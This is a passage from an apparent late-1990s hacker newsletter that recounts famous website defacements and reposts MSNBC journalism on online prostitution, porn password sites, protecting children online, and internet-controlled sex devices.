AlterNIC. Kashpureff dubbed this maneuver Operation DNS Storm, and many
applauded him for pulling it off. It was also illegal, and unlike most
hacker/crackers, Kashpureff had left his fingerprints all over it by
sending DNS traffic to his own domain. Sensing he was in trouble,
Kashpureff fled his native Washington for Canada to escape the law.

Eventually, however, he was arrested, arraigned, and found guilty of one
count of computer fraud the following year. As for the battle over domain
names, it's still raging, and AlterNIC, now overseen by Kashpureff's
partner, is still
providing an alternative.

Earlier this decade, several of ValuJet Airlines' planes crashed because
of poorly maintained equipment. To separate itself from a name that had
become synonymous with air disaster, the company became AirTran in 1997.
Under the
banner headline "The Making of a New Airline," the
company's Web site prominently featured a press release announcing the
changes.

It'll Take More Than a Name Change
But the announcement only
attracted hackers, who quickly attacked the site and littered the pages
with sick, locker-room humor. The proud banner headline was replaced with
"So we killed a few people. Big deal."



The press release was similarly edited:

ATLANTA, Sept. 24, 1997--ValuJet Airlines today changed its name to
AirTran Airlines and along with its merger partner AirTran Airways
introduced a new business strategy designed to bring dismemberment
to a broader
travel audience. The airline said that its
objective is to make air travel more attractive to business
travelers and even more convenient for suicidal maniacs.

"Over the past year we've renewed our focus on the basics of our
business with safety, reliability and operational excellence as our
goal," lied Corr, who joined the carrier in November 1996...
"AirTran's mission is to kill air
travel customers who can
actually afford to die. It's that simple."

The parody dipped into even more crass humor than these examples (if you
can believe that).

Sick Jokes Will Prevail
AirTran promptly removed the hacked page,
and the hackers were never caught. They did, however, send a copy of the
page to 2600 Magazine for posterity. And the moral of the story is that
no matter the medium, when it comes to mass tragedy, it's only a matter of
time before the sick jokes start.

The New York Times is not a popular newspaper among hackers. The main
reason is that Times writer John Markoff brought national attention to
Kevin Mitnick's story--even cowriting the book Takedown with security
expert Tsutomu
Shimomura, who led the team that eventually nabbed
Mitnick.

Don't Mess With Our Hero

A group calling themselves HFG (Hacking for
Girliez) decided to engineer their own takedown. On
September 13, 1998, the main page of the New York
Times's site was replaced by an eccentric diatribe
that attacked John Markoff and another writer
working on a book about hackers. To the average
person, this hack looked like gibberish, littered
with mostly uppercase phrases like "TH1Z 0N3 IS F0R
Y3W."

Those able to decipher the hack could read that HFG
was concerned not just with raising consciousness
in support of Mitnick, but also with grandstanding
about its own hacks. The hackers wrote of their

own "rooting" exploits (that is, hacking the root
directory of a server) at sites including those of
Penthouse, Motorola, and an ISP in New Mexico. And
those who made it to the end of the page found a
statement that more interesting material could be
found in the HTML source of the hack.

And by the Way, Here's Our Manifesto
Sure enough, the source
contained comments in conventional spelling and capitalization, detailing
HFG's beliefs and exploits and quoting liberally to bolster its position,
as with this quote from G.K. Chesterton: "A good joke is the one ultimate
and sacred thing which cannot be criticized. Our relations with a good
joke are direct and even divine relations."

In the end, the New York Times fixed its site, and the perpetrators got
away, proving that even the most venerable of newspapers is no match for
cybervandals with a grudge.

Hackers live for the opportunity to promote themselves. They love
grandstanding. Some might say that they have a lot in common with
Internet gossip columnist Matt Drudge.

Same Look and Feel
So it wasn't surprising when a group calling
themselves United Loan Gunmen took a jab at the root directory of the
Drudge Report on September 13, 1999. Except for a change to the site's
banner--the title was changed to ULG Report--the front page maintained the
spartan, almost graphic-free look of the regular Drudge Report.



The difference was in the headlines: the big banner read "United Loan
Gunmen take control of Mike (sic) Drudge's data stockyard to once again
show the world that this is the realm of the hacker." The top few
headlines covered hacker
issues, such as "Kevin Mitnick still in
jail" and "2600 Magazine continues to get worse over the last year, and
the Web page is still crappy to boot."

A Little Goes a Long Way
But except for those few changes, the site
remained pretty much the same, with the site's search engine and links to
Matt Drudge's regular column and archives still functioning. This may
have been because the hack was a rush job, but it is noted in 2600
Magazine's Hacked Sites archive as a good example of a "less is more"
hack.

Once the smoke cleared, Drudge regained control of his root directory,
and the unidentified hackers presumably went on to bigger and better
hacks. As for the moral of the story, well, maybe just that Drudge got a
taste of his own
medicine.

A single hack launched an amazing career for "David Lightman," the
teenage identity assumed by a 21-year-old man in the early 1980s. David
began his hacking career by adjusting school grades on a high school
computer, then went
looking around for more challenging fare.

Taking on the Pentagon
He found it by accidentally logging on to a
Department of Defense computer and initiating a program there called
Global Thermonuclear War. Unbeknown to him, this actually gave him
complete control over the U.S. nuclear arsenal. In his enthusiasm to
explore the limits of the program, he threatened then-Soviet Russia to a
nuclear standoff--and brought the world to the brink of destruction.

Thankfully, disaster was averted, and David became quite a celebrity as a
result. He began rubbing shoulders with Hollywood's glitterati, such as
Michelle Pfeiffer, Jennifer Jason Leigh, and Meg Ryan. He also buddied up
to Marlon
Brando, Jim Carrey, George Segal, and James Earl Jones.

Plays a Hacker on TV
David Lightman's real name is Matthew
Broderick, of course, and the role he played in 1983's WarGames was pure
fantasy. Real-world hackers--despite their posturing, bluster, talents,
and occasional good intentions--couldn't hope to
get within a thousand yards of Meg Ryan. The closest they can aspire to is
hacking the Internet Movie Database.

But the social life of hackers aside, Lightman's make-believe hack is what
catapulted hacking into the public consciousness and gave us the idea that
hackers can take control of fundamental systems, such as the Department of
Defense computers or the electrical grid. Hackers like to foster such
misconceptions, but in reality, no one's ever come close to the computers
that control the nuclear arsenal or any such system. And let's just hope
no one ever does.

@HWA

40.0 MSNBC Special Report
~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by UNREAL
An MSNBC Special report entitled "Internet underground"
Really isn't all that special. They have gathered
together a lot of old content and repackaged it under a
new heading and then called it a special report. Unless
you have been living in a cave the last six months I
wouldn't bother. (Actually this may be months old, first
time I have seen it.)

MSNBC
http://archive.msnbc.com/modules/hacking/default.asp


Step warily into

  
the Internet Underground, home to sex traders,
scam artists, hackers and “crackers,” and a place where you had best
watch your back and keep an eye on your kids.

SEX The seedier side of the net's underbelly...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

By Mike Brunker
MSNBC

June 2 — Demonstrating the adaptability that
helped earn it the title of “world’s oldest
profession,” prostitution is thriving on the
Internet, slipping into comfortable new guises
like sex-for-money chatrooms and Web sites
showcasing fancy call girls and boys. But with
the continued expansion of the online sex trade,
and the appearance of numerous civilian
vigilante groups determined to halt its spread,
pressure is building to rein in the hustlers and
hookers of cyberspace.

THE USE of the Internet to advertise prostitution has
received far less attention from law enforcement, politicians
and the media than its notorious cousin, online pornography.
But workers on the front lines of cybercrime say it is a
growing concern, particularly when it involves minors selling
their bodies to the highest bidder in chatrooms.
Crusaders like Pete Hampton, a former lawman who
established the Web Police to serve as an online clearing
house for complaints of online criminal activity, say that when
they attempt to bring prostitution cases to the attention of
authorities, they are often met with indifference.
“We find very few will even touch it,” Hampton said.

A DIFFICULT ISSUE
“It’s hard to bring this issue to an investigative agency’s
attention,” agreed Linda Fairstein, chief of the sex crimes
prosecution unit of the Manhattan District Attorney’s Office.
“...Government resources, especially with local police
agencies, don’t begin to compare with what what Web-literate
people can do in terms of crime, prostitution in many ways
being the least of it.”
Federal authorities, however, insist that they have quietly
been pursuing the most serious cases for some time.
Peter Gulotta, head of the FBI’s Innocent Images task
force in Baltimore, told MSNBC that the bureau is currently
pursuing several cases involving online prostitution rings that
extend across state lines, a prerequisite for federal
involvement. Similar cases have been brought in Dallas, Miami
and Boston over the past several years, he said.
Federal cases have almost exclusively focused on cases
involving children, but local authorities are beginning to
demonstrate a limited interest in virtual vice.

Police in Florida, Nebraska and New Jersey have in recent months
busted at least five online “escort” services that allegedly were
providing sex for money. Only one involved minors: A case in Palm
Beach County, Fla., in which 27-year-old Jay Ryan Quinn stands
accused of prostituting underage runaway girls through his Web site.
Though there are no numbers to quantify the
prevalence of prostitution operations on the Internet, as neither
the federal government nor the states keep track of such
cases.
But Hampton, of the Web Police, says he and his staff
receive an average of 50 to 75 reports of prostitution each
week out of a total of 1,500 complaints.
Echoing the complaints of police departments around the
world, Hampton says he and his staff engage in triage to focus
on the most important cases — those involving children.
"We have to prioritize,” he said. “... If this is
simply a matter of a call girl service or an individual female
advertising her services on the Internet, and she’s of legal age
of consent, this is not a priority case. If this is someone
advertising child prostitution or selling children on the Internet,
it does become a priority case.”

A DECOY’S VIEW
Donna, a volunteer undercover decoy who lures
chatroom pedophiles into the arms of police, says anyone who
doubts how widespread the online sex trade has become
should try posing as a 15-year-old girl in an adult chatroom
like AOL’s “Barely Legal” forum.




Donna, a concerned
parent, goes undercover
to prowl chatrooms for
pedophiles.



"I can count to 10, and by that time I’m already
being hit on,” said Donna, who asked that her last name not be
used to diminish the threat of retaliation from those she has
helped prosecute. “... Individuals are coming in and sending
me private messages asking me, ‘Do I like 40-year-old men?’
and asking me about different sexual situations. I’ve had
them mail me plane tickets. I’ve had them offer me their condo
on the beach if I just come stay for the week. Anything,
anything that a child will want.
"If you’re a troubled teenager, it’s an absolutely
easy way to make quick money. ... You can almost have an
auction. You can sit there and say, ‘Well, this guy just offered
me 50 bucks.’ ‘Well then, I’ll offer you $100.’ And she can
barter herself and set the time and place. How easy is that?”

In the Quinn case, the tip that launched the investigation
came from one of the alleged hookers. But more and more
often, citizen vigilantes like Donna and agencies that focus on
sexual abuse of children are playing a key role in bringing
prostitution cases to the attention of authorities — and in
particular, those that involve minors.
Ruben Rodriguez, director of the National Center for
Missing and Exploited Children’s Cyber Tipline, said his staff
has seen substantial growth in the number of pedophiles using
chatrooms to lure unsuspecting children teens into situations
where they are likely to turn to prostitution.


-=-

Sex Password Sites
~~~~~~~~~~~~~~~~~~


Password sites: free thrill or a ploy?

They may look illicit, but some are in cahoots with pay sites

The 70 to 75 password sites on the Web have similar
appearances -- and content.


By Mike Stuckey
MSNBC
Pssst! Hey, buddy, wanna look at the latest, greatest Internet
porn for free? Pictures, videos, erotic stories and live sex
chats — it’s all yours for nothing.

LURKING AMONG thousands of sites in the World
Wide Web’s red-light district are some that appear to offer
an extra layer of illicitness. So-called “password” sites have
proliferated for years, appearing to grant their visitors free
access to a cornucopia of otherwise expensive adult
content. In truth, however, while some adult Webmasters
rail against the password sites, others are in league with
them and actually use them as part of their marketing efforts.
The password sites have a similar look, with lists of
adult Web site addresses, user names, passwords and
critiques. Often, surfers don’t even need to log in to the pay
sites manually; instead, the password site operators code
their lists so a single mouse click appears to take porno
pirates right through security screens.
So what’s the attraction in ripping off a bunch of
passwords to adult Web sites and giving them away?
Money, naturally.


“Go to my site,” says one New Zealand Webmaster in
a telephone call, “and I’ll give you a tour.” This entrepreneur
— we’ll call him Joe — spoke with MSNBC on the
condition that his name not be used and says he is
“probably the biggest” password baron on the Web. “I do a
million bucks a year.” That couldn’t be confirmed, but other
password and pay-site operators generally confirmed his
comments on how the business operates.
On this day, the first thing a surfer sees on Joe’s home
page is a banner ad for a hard-core sex site.

PAY-PER-CLICK
“That’s pretty much the first way we make money,”
Joe says. Like mainstream Web advertisers, porn peddlers
pay for every click their banner ads generate. It doesn’t
stop there. “If people go to that site and buy in we get half
that money.”
More lucrative, says Joe, is the sale of the top positions
in the password lists themselves. The first “purloined
password” on his list is really an ad for a site that paid
$14,000 for a month’s run. Users who click on it, in fact,
are whisked to a page full of porn snippets and colorful
exhortations to sign up for membership, nothing that any
Web surfer can’t come across on his own.
Joe also sells the second and third spots on his
password list, which also take users to membership
come-ons rather than actual password-protected porn.
Below the top three, however, are some passwords that
appear to give users illicit access to adult content on pay
sites.
Among pay-site operators who have found passwords
to their pages listed on such sites is Seattle-based Internet
Entertainment Group, one of the kingpins in Web
pornography.
“We’re very much against the password-theft sites,”
says IEG President Seth Warshavsky, who points out that
in addition to protecting revenue, passwords are intended to
keep underage users from viewing pornography. “We
actually quite regularly send cease-and-desist letters” to the
operators of such sites.
IEG’s attorney, Derek Newman, provided MSNBC
with a copy of a letter his firm sends to operators of Web
sites that post passwords to IEG pages. Citing federal and
state laws, the three-page document makes a number of
legal threats to such Webmasters, from lawsuits to vast
fines.

“As a general rule, the password sites are very
responsive to the cease-and-desist letters,” Newman says,
and IEG has never sued one.
That’s true, say New Zealand-based Joe and other
password-site operators. “We don’t need to run them. We
just pull them off our sites.”

FTC STEERS CLEAR
The issue hasn’t appeared on the radar screens at the
Federal Trade Commission, which has taken the lead role
among U.S. agencies that investigate and prosecute fraud
on the Web. An FTC spokeswoman says it would be
considered a “business-to-business” issue, calling for civil
action.
While Warshavsky believes password sites buy and
hack for their wares, Joe and others say many of the
passwords are simply given to them by users who signed up
at a pay site and then felt ripped off. “There’s a lot of
absolutely ruthless Webmasters out there,” Joe says,
operations that overcharge users’ credit cards or greatly
exaggerate the content on their sites.
Password sites are “almost the crucible that people use
to get them back,” says Joe.
Aside from simply being given the passwords, Joe and
other Webmasters say, there are other ways to get them.
Many sites simply copy passwords from other password
sites. A British Webmaster tells of software that “basically
just sits there, goes out every two to three hours and looks
for passwords on every site and copies them.” A tour of
password sites shows this to be true, with many of them
listing the same sites, logons and passwords, sometimes in
the same order.

HACKING FADES
Then there’s hacking, either by using programs to try
many combinations of common user names and passwords
over and over again or simply stealing entire files of
passwords. But password posters say that as security has
grown on the Web those methods are harder than they used
to be and not employed as often.
Whether Webmasters like Joe are given the passwords
or steal them, it’s up to pay-site operators to protect
themselves, says one. Traci Earl operates a number of
Netherlands-based adult pay sites and does business with
password sites.

“The problem is not password
sites, which have always been around
and are simply a fact of life in this
business,” Earl says. “The real
underlying problem is that of insecure
passwords. Passwords get shared in
offices, in bars, by email, by being
posted to conferences and
newsgroups and by a thousand other
routes.”
Earl says there is a “simple, foolproof and highly
necessary strategy for anybody who is serious about running
adult pay sites” to deal with the problem of improper
password use. All they need do, Earl points out, is run
logging software that lets them know how often and from
how many different locations user IDs and passwords are
being used. It quickly becomes obvious when one is being
abused and it can then be rendered inoperable.

‘IRRELEVANT’
“Serious adult webmasters know that once the problem
of insecure passwords has been fixed then the password
sites are at worst irrelevant and at best are a potential
source of traffic,” says Earl.
For Webmasters like Earl, that traffic has generated an
“if-you-can’t-beat-’em-join-’em” attitude.
That, says Joe, has led to a bit of a boom in password
sites. From a handful several years ago, the sector has
grown into 70 to 75 sites, he and his European colleagues
estimate. “We have half a million unique people come
through our site a day.”
Joe himself will post passwords to his own pay sites as
if they are “hot,” then kill them a short time later. Users
quickly flood the pay site and some will sign on as paying
customers, he says.
Other pay-site Webmasters use ruses in conjunction
with getting their passwords posted on sites like Joe’s. One
is to send users who attempt to use “illicit” passwords to an
ominous warning screen that tells them their identity has
been noted and they will be in big trouble for trying to use a
stolen password if they don’t sign up at once for a paid
account.
“It’s a load of rubbish,” says one European
password-site operator. “It’s just a way to get you to join.”
But such tactics work, says Earl, because “You have to
remember that the customers for pay sites are not
sophisticated surfers. They are, in the main, middle-aged
and new to the technology.”
That also explains the draw of password sites
themselves. “The lure of something for nothing is very
powerful.” Earl says. “In truth, there is very little available
on pay sites that is not available for free somewhere on the
Net if you have the skills and the knowledge to know where
to find it.”
The password-site operators themselves have come up
with some inventive ways to explain what they’re doing. A
“disclaimer” on some of the sites notes that it is intended
solely to alert pay-site operators that their passwords have
been compromised.

You can almost hear the winking.

Protecting your kids
~~~~~~~~~~~~~~~~~~~~

By Bob Sullivan
MSNBC

Many safety guides for children using the Net
read as if they were written by Robert Fulghum.
Everything I ever needed to know to stay safe in
the virtual world, I learned in the real world.
Don’t go scary places by yourself. If someone is
making you uncomfortable, just leave, and tell
your parents. Don’t look at pornographic
pictures, and you won’t have to worry about
them. But most important — don’t talk to
strangers, and never give them personal
information. Unfortunately, it’s not that simple.

IF IT WERE SIMPLE, you can bet that earlier this
month there wouldn’t have been 100 alleged pedophiles
arrested and tens of thousands of pictures of children — as
young as 2 years old — seized. See the MSNBC story.
It’s not simple because strangers online are hard to
identify, since the Net is the land of make-believe. And just
as kids are often better than their parents at playing make
believe, they’re often better at keeping up with technology,
too.
Some are tempted to dismiss the problem as no
different from your teen-age son sneaking a peek at
Playboy — on paper, or online. No big deal.
True, experts say. The problem is not nudie Web sites.
Most of those require credit card numbers, anyway.
“Pictures don’t hurt kids,” said Parry Aftab, author of
“A Parent’s Guide to the Internet.” “People hurt kids…. As
long as parents think the only real risk is the kids will see
adult sex content, they won’t do anything.”


MSNBC’s parenting on the Net survey

The real problem is people who lurk in chat rooms and
Internet Relay Chat (IRC) channels who hope to lure your
child into having online sex or a face-to-face meeting. It’s
impossible to say how many pedophiles there are lurking on
the Net, but if you doubt the severity of the problem, log on
to almost any IRC channel. You’re unlikely to last 60
seconds without being propositioned.
U.S. customs agent Marcus Lawson pretends to be
young boys or girls for a living. He arrests about 30
pedophiles a year — as big a caseload as he can handle.
When MSNBC interviewed him, he was working an IRC
“dad-daughter sex” channel. There were 73 users. (“Hmm.
He wants to know if my daughter has breasts yet. I’ll tell
him no.”)
“I don’t think the Internet has created more pedophiles.
It’s removed the societal stigma that kind of kept people in
check,” he said. “Before the Net, pedophilia was a lonely
business. Now 24 hours a day, seven days a week, you can
validate yourself, find hundreds and hundreds of people
who will tell you there’s nothing wrong with having sex with
children.”




NBC’s Pete Williams
reports on one man’s
battle to catch
pedophiles on the
Internet.



So the real trouble for your kids begins not with
information coming into your computer but with what goes
out of your computer. The problem is what your child says
in e-mail, posts to a bulletin board or writes in a chat room.
And this is where things get complicated.
Think you can simply tell your child not to e-mail
strangers? This reporter was put in a very uncomfortable
situation doing this story. The bulletin board thread related
to this piece had an entry from a poster identifying herself as
a 17-year-old girl who felt her parents were too controlling
— they read her e-mail, observed her online, etc. MSNBC
felt it necessary to write to the girl to confirm her identity
and age as authentic. But that left us in the uncomfortable
situation of sending an e-mail to a minor, asking her to call
us or send us her phone number. That’s exactly what she
shouldn’t do. For better or worse, she did not respond to
our e-mail. Her posting is included in the sidebar of your
BBS postings.



What else can go wrong?

ONLINE COMMERCE: The Internet is a defrauder's
heaven. The Federal Trade Commission offers a number
of suggestions. More...
HATE GROUPS: There's lots of negative racial, ethnic,
religious, or gender-based propaganda on the Net -
sometimes it's well disguised. More..
LOSING YOUR IDENTITY: Know that it's easy for
someone else to pose as you on the Net More..
SPAM: Just an annoyance, but a growing one. More..
VIRUSES: It's easy to pick up a virus using the
Internet, even just reading your e-mail. More..
HOAXES: The Internet has raised the Urban Legend to
new heights. More..
HARASSMENT: Even though it's just bits and bytes,
it's still harassment if you tell someone to leave you
alone and they don't. More..








Many authorities suggest using technology to combat
technology. About 75 percent of the parents responding to
MSNBC’s survey said they’d consider using software to
limit their child’s ability to communicate with others over the
Internet. Filtering software like NetNanny, for example, can
be set to prevent children from even typing personal
information such as their name, address and phone number.
But users responding to an MSNBC survey were evenly
split over whether they’d read their child’s e-mail, as was
suggested by the FBI when it issued a parent’s guide to the
Net on Sept. 1.
“I _HONESTLY_ wonder if most of you realize what
you are saying when you say read your kids e-mail,” said
David Weaver on the MSNBC Technology BBS. “Reading
a kids e-mail is like: Reading normal mail they send
Evesdropping on all thier conversations Picking up another
phone line when they are on the phone.”
One response: “Hands off parenting is not the answer.
Blind trust and faith are why you see kids pictures on the
back of milk cartons. Now, keep in mind I am not going to
go through all their mail every night. They should just be
prepare to answer for anything if and when I do.”


See a collection of posts to the BBS

Stretch that adult monitoring of e-mail argument one
step further — Clay Slape of Big Springs, Texas, is
incensed that his daughter’s school sent home information
saying the district reserves the right to read student e-mail.
“If my child writes me a personal e-mail, I don’t want some
teacher reading it,” he said. Big Springs Independent School
District officials say the point is moot because students
aren’t allowed e-mail at all in the district — but the
regulation comes from the state department of education, so
expect concerned parents all around Texas to wonder out
loud about their child’s First Amendment rights.
While three-quarters of MSNBC respondents said
they’d consider technological help, few actually use it.
Filtering software has so far been a bust. A FamilyPC
survey published late last year indicated only 4 percent of
parents use parental control software. A survey of
Baltimore school district parents done earlier this year
produced similar results.

Net filtering software
PC Magazine editors preferred Cyber Snoop, noting that
parents can modify the list of restricted sites. Most products
keep their lists a secret. NetNanny also allows access:
Program


Check MSNBC for reviews on these products - Ed

Cyber Patrol www.cyberpatrol.com
Cyber Snoop www.pearlsw.com
CYBERSitter www.solidoak.com
Cybersentinel www.securitysoft.com
Net Nanny www.netnanny.com
SurfWatch www.surfwatch.com
Time's Up www.timesup.com
WatchDog www.sarna.net/watchdog
WebChaperone www.webchaperone.com
X-Stop www.xstop.com



These programs work in a variety of ways, but
generally either block your computer from a predetermined
set of yucky Web sites; limit your computer to a
predetermined list of Web sites; or block individual Web
pages with offensive words. It’s easy to see the limitations
of all three, and apparently parents have, too.
Aftab, who thinks filtering software can be an aid for
parents, says some mistakenly believe the software is too
technical to use or easy for clever kids to foil. Or they shrug
and say, “I trust my kid.”
But experts say parents often aren’t really aware of the
extent of the trouble their kids can get in on the Internet.
That’s why this week is National Kids Online Week, and
AOL’s Steve Case and Secretary of Education Richard
Riley will be kicking off on Tuesday a nationwide parental
education program called “America Links Up.”
And that’s why Seattle police detective Leanne Shirey
starts her seminars for parents by posing as a 14-year-old
girl in an AOL chat room. She then lets parents watch as a
pedophile “grooms” her. There’s never a need to fake the
demonstration.
“The problem is we educated kids before we educated
the parents,” Shirey said. “Some of these people I see have
never turned on a computer. They have to understand that
even if they don’t have a computer at home, they have to
have rules.”

More safety resources
If you see evidence of illegal activity, call local police and/or write to
cybersmuggling@customs.sprint.com
http://www.safekids.com Has tips for parents, including advice on
handling the Net posting of the Starr report. Operated by Larry Magid, a
syndicated columnist for the Los Angeles Times, the site is sponsored by
the Online Safety Project, funded by America Online, Network Solutions
and Disney.Com
http://www.bcplonline.org/online Baltimore County schools' Parent
Internet Education site. Includes a sample curriculum.
http://www.americalinksup.org Home page for organization sponsoring
National Kids Online Week events. Includes searchable database of about
100 local educational events. Also includes sample curriculum.
http://www.fbi.gov/tips.htm FBI's "A Parent's Guide to Internet Safety"
http://www.cyberangels.org/Volunteer Internet watchdog organization that
maintains lists of kid-friendly sites. Founded by Curtis Sliwa, Guardian
Angels founder.


Baltimore County Public Schools held an America
Links Up “teach-in” for parents Sept. 14. Coordinator
Della Curtis says the survey of parents in the
104,000-family district showed that most don’t know what
their children are doing in school with the Internet, and that
lack of information is a chief cause of anxiety.
“I know of one parent who … took the keyboard with
her when she left the home,” Curtis said. You might call that
filtering hardware.
Not terribly constructive. Here’s a collection of
suggestions from several experts that’s a little more
practical:
There is no substitute for keeping up with the technology.
Don’t shrug or say it’s beyond you. If it is, ask your children
to train you. That will make sure you keep up with them.
Learn how to examine your Web browser’s “History”
files, or cache. Even if you don’t do it, make sure your
children know it’s possible for you to know where they’ve
been.. For Netscape Navigator 3.0, for example, it’s in
C:\Program Files\Netscape\Communicator\cache.
Look around your desktop, start menu or applications
folder for suspicious programs.
Keep abreast of all your child’s e-mail accounts;
understand that free Web e-mail may allow your child to
have plenty of e-mail accounts you don’t know about.
If your child will chat, take some time to come up with an
alias, or fake name. Aftab even suggests you give them a
fake address and phone number so, if they’re being
harassed, they have a way of vacating the situation.
Play around in Usenet and IRC chat rooms so you can
talk to your children intelligently about them, and perhaps
decide to ban their use. Contact your Internet provider to
see what kind of Usenet groups are available; you can
download an IRC program from this site.
Of course, the Robert Fulghum-style advice is useful.
Do the things you would normally do in the real world. Get
to know your children’s cyberfriends — certainly don’t let
them meet anyone in person without your attendance.

-=-

Sex toys blaze tactile trail on Net

Adult industry’s newest twist: Devices that vibrate, tickle at
click of a mouse

Vivid Entertainment Inc. hopes to begin selling its
"cyber sex suit," which comes in both male and female models,
early next year.


By Mike Brunker
MSNBC

Oct. 4 — This is clearly not what AT&T had in
mind, but entrepreneurs in the online sex
industry have figured out a way to use the
Internet to literally reach out and touch, tickle,
buzz or scratch someone. And while
“cyberdildonics” and the “cyber sex suit” may
not move the Earth outside the world of online
sex, as the first products to explore the Net’s
tactile possibilities they are likely to touch off a
commercial land rush to the new frontier.

THE ONLINE SEX industry has long played a
pioneering role in moving innovative Net technology like live
video and interactivity into the mainstream. The creators and
users of the cyberdildonics and the cyber sex suit say they
expect their products to continue that trend.
“If you can control a sex toy through your monitor, you
can control just about anything,” said Allen Hadazy, president
of SafeSexPlus.com, which has reported brisk sales of the
cyberdildonics devices since their debut in April. “Controlling
devices remotely through an everyday Internet connection isn’t
the future. It’s here now.”
But some observers of the technology sector say the
primitive state of tactile technology relegates the latest in
orgasmic gadgetry to the curiosities category.

‘IT DOESN’T REALLY EXIST’
“I’m interested in why people are fascinated with
this idea (sex at a distance), even though it doesn’t really exist
and may never exist at that realistic, immersive level,” said
author Howard Reingold, who first used the term
cyberdildonics in his 1991 book “Virtual Reality.”
The two devices employ very different strategies to reach
their goal, which the creators of the cyberdildonics sex toys
have dubbed “feel-good Internet.”
In their case, the developers simply took an offline
technology — electric vibrators and other sex toys — and
created a devilishly simple but clever system that allows their
speed to be controlled over an Internet connection.
"It’s going to be very beneficial, I imagine, for
military couples, and I think (there is) going to be a day when
these toys are given as bachelor and bachelorette gifts much
more than lingerie and strippers and stuff,” said Cheyenne, an
adult-site webmistress who offers customers the option of
using cyberdildonics in video-chat sessions.

SENSORS IN A NEOPRENE BODYSUIT
The cyber sex suit, on the other hand, is strictly a
for-the-Net creation: a neoprene bodysuit equipped with 36
sensors that, at the click of a mouse, can deliver a handful of
sensations to the wearer.
"It may bring you to full orgasm; it may not,” said
Lisa, a model who has served as a test subject for the cyber
sex suit, which is expected to go on sale early next year. “...
It’s not about that. It’s more about playing with your partner.”
But David James, president and co-founder of Vivid
Entertainment Inc., the suit’s developer, said that he expects
the invention to turn the online porn business on its ear by
allowing suit-wearing customers to participate.
"The suit (will) … virtually revolutionize the 900-
and 800-number-type business,” said James, a Welsh
immigrant whose first job was hard labor in a coal mine in his
native land. “…That actually is where the very big money
would be in the future.”
He also figures his Van Nuys, Calif.,-based company,
which also produces adult television fare, operates a passel of
porn Web sites and bills itself as the world leader in Digital
Versatile Disc (DVD) technology, could profit by selling DVD
discs with new themes and sensations each month to those
who purchase a suit.

SEX TOYS SELLING BRISKLY
The early reception given the cyberdildonics line —
coupled with the fact that the online sex business is now pulling
in roughly $1 billion a year, according to analysts’ best guesses
— suggests the appetite for such online accoutrements is keen.


Hadazy, whose San Francisco-based firm developed the
sex toys, which range in price from $29.99 to $99.99, said
sales have climbed to between 50 and 100 units a day without
any advertising.
Most of the sales have been to members of the Intimate
Friends Network (commonly known as Ifriends), a 1.9
million-member online community whose members provided
the impetus by requesting a line of sex toys for both men and
women that they could use in conjunction with adult video
chat, Hadazy said.
“The users of this service, over time, began to request that
the intellectual stimulation they enjoy over the service be
augmented with actual physical stimulation,” he said. “Some of
the users suggested a few clever ideas and the result was
SafeSexPlus.com, which markets and sells the cyberdildonics
devices.”
The key that allows a user to remotely control the devices
is a photo diode that is attached to the computer monitor with
a suction cup and responds to changes in brightness on the
screen.
“As those pixels brighten, the intensity of the device will
increase; as the pixels darken, the intensity will decrease,”
Hadazy explained. “The remote user, elsewhere on the
Internet, is in effect in control of the brightness of a section of
your monitor. And that’s what makes the device completely
and utterly cross platform and supported by any Internet
connection.”

DIFFERENT SET OF DIFFICULTIES
Developers of the cyber sex suit faced a different set of
difficulties, namely mimicking sensations produced by real
world touch.
Vivid Entertainment's David
James and Lisa, a model
and suit tester.
James, the president of the
Van Nuys, Calif.,-based Vivid
Entertainment, said the suit
works like this:
The initiator uses software
on his computer to select one of
five sensations — tickle,
pinprick, vibration, hot or cold
— and direct it to a specific part
of the suit wearer’s body. An
electronic signal is sent to a
DVD player, through the
Internet, to the suit wearer’s
computer and finally to the suit itself, where it activates the
appropriate sensor.
“To be honest, it’s nothing magical,” he said. “I’m
sure a pair of college students could have probably sat down
and come up with something far more futuristic than we have
here. The big advantage we’ve got, of course, is our marketing
ability to first of all have it made and then be able to sell it
worldwide.”
He said the company has spent about $180,000 to
develop the suit, which he said will retail for about $170.
But before seeking approval from the Federal Trade
Commission to market the suit, James’ team must conquer a
final sticky problem: Ensuring that the range of electrical
sources and delivery systems around the world don’t trigger a
potentially dangerous electrical surge.

FEARS OF A SURGE
"If, for example, a chap was wearing a pacemaker
... and he’s hooked up to a generator ... he could (be) fried or
whatever by that extra power going through it,” James said.
Despite such difficulties, some observers see the advances
incorporated in the cyber sex suit, particularly its use of DVD
technology, as an important step toward a new breed of
interactive products that incorporate some sensory capability
with high-resolution video for a more-realistic experience.
“I can really see programs, like maybe golf or tennis or
skiing ... where it would be necessary to have kind of a virtual
environment,” said Julia Rivera, executive producer of Inside
DVD magazine. “So say if you go the golf DVD, you would
be able to connect and take a golf lesson. And because of the
video capability of the DVD, you could select the best golf
courses in the world (to practice on).”
But researchers say the primitive state of tactile
technology today means that dramatic advances will be
needed before such programs can be created. And they warn
that the computer generation’s holy grail — virtual reality —
remains years if not decades in the future.
In order to create a realistic computer-simulated
environment that would allow a user to “touch” other
inhabitants of the virtual universe, tactile sensors must be able
to both register the computer user’s position and render
feedback, said Ian Davis, director of technology with
computer game-maker Activision.

‘A LOT OF OBSTACLES’
“There are a lot of obstacles,” he said. “The underlying
technology is pretty rudimentary right now. There is some
ability to do ‘force feedback’ and some ability to measure the
location and angles of joints on the human body, but it isn’t
robust yet and is still years away from being technically solid.”
Mel Siegel, a senior research scientist in robotics at
Carnegie Mellon University, said the biggest problem is the
complexity of the information required for the brain to
determine the shape and texture of an object.
"You put your finger down on a complex surface
and you really don’t get a great deal of information from that,”
he said. “You now move your finger over that complex surface
and you start to understand the shape and structure of what
you’re feeling. And I think the hard part (of simulating touch) is
that dynamics.”
That hurdle has stopped previous attempts to incorporate
any but the most basic tactile sensations in computer
applications, and it will again prevent the technologies
pioneered by the cyberdildonics and the cyber sex suit from
having much of an impact, said computer scientist and
high-tech visionary Jaron Lanier, credited with coining the term
“virtual reality.”
“There have been things like this for a long time,” said
Lanier, who recalled seeing similar suits and remote-controlled
dildos more than a decade ago. “…I think there’s nothing new
here except for the scale of it. There’s a lot of money and a lot
more people on the Internet now, so from a social point of
view this would be new. But I’m going to predict failure for it.”

-=-

Will hackers or spies knot the Net?

A decade after the ‘worm,’ network still vulnerable, experts say


